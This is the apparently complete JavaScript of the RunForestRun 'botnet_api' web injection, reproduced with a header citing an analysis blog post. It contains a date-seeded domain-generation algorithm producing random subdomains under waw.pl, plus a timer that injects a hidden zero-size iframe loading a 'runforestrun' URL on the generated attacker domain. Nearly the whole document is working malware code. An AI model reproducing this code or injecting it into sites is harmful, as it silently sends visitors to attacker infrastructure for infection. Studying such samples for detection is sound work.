/* New domain name generating algorithm used by the "botnet_api" version of

1. /* New domain name generating algorithm used by the "botnet_api"
2.    version of the RunForestRun attack described here:
3.    http://blog.UnmaskParasites.com/2012/07/26/runforestrun-now-encrypts-legitimate-js-files
4.    ============================================================== */
5.  
6. //Congratulations! you have successfully extracted the gootkit payload
7. //this means i must work hardly :(
8.  
9.  
10. function nextRandomNumber() {
11.     var hi = this.seed / this.Q;
12.     var lo = this.seed % this.Q;
13.     var test = this.A * lo - this.R * hi;
14.     if (test > 0) {
15.         this.seed = test;
16.     } else {
17.         this.seed = test + this.M;
18.     }
19.     return (this.seed * this.oneOverM);
20. }
21.  
22. function RandomNumberGenerator(unix) {
23.     var d = new Date(unix * 1000);
24.     var s = Math.ceil(d.getHours() / 6);
25.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
26.     this.A = 48271;
27.     this.M = 2147483647;
28.     this.Q = this.M / this.A;
29.     this.R = this.M % this.A;
30.     this.oneOverM = 1.0 / this.M;
31.     this.next = nextRandomNumber;
32.     return this;
33. }
34.  
35. function createRandomNumber(r, Min, Max) {
36.     return Math.round((Max - Min) * r.next() + Min);
37. }
38.  
39. function generatePseudoRandomString(unix, length, zone) {
40.     var rand = new RandomNumberGenerator(unix);
41.     var subdomainlen = Math.floor(Math.random() * 32);
42.     var letters = "huozfexmrufmqhgnsvkehzrfrqoplpvbuaxoqeriqwkgfkdyenzossqlxfqayvpr".split('');
43.     var str = '';
44.     for (var i = 0; i < subdomainlen; i++) {
45.         str += letters[Math.floor(Math.random() * (letters.length - 1))];
46.     }
47.     str += '.'
48.     for (var i = 0; i < length; i++) {
49.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
50.     }
51.     return str + '.' + zone;
52. }
53.  
54. setTimeout(function() {
55.     try {
56.         if (typeof iframeWasCreated == "undefined") {
57.             iframeWasCreated = true;
58.             var unix = Math.round(+new Date() / 1000);
59.             var domainName = generatePseudoRandomString(unix, 16, 'waw.pl');
60.             ifrm = document.createElement("IFRAME");
61.             ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet_api");
62.             ifrm.style.width = "0px";
63.             ifrm.style.height = "0px";
64.             ifrm.style.visibility = "hidden";
65.             document.body.appendChild(ifrm);
66.         }
67.     } catch (e) {}
68. }, 500);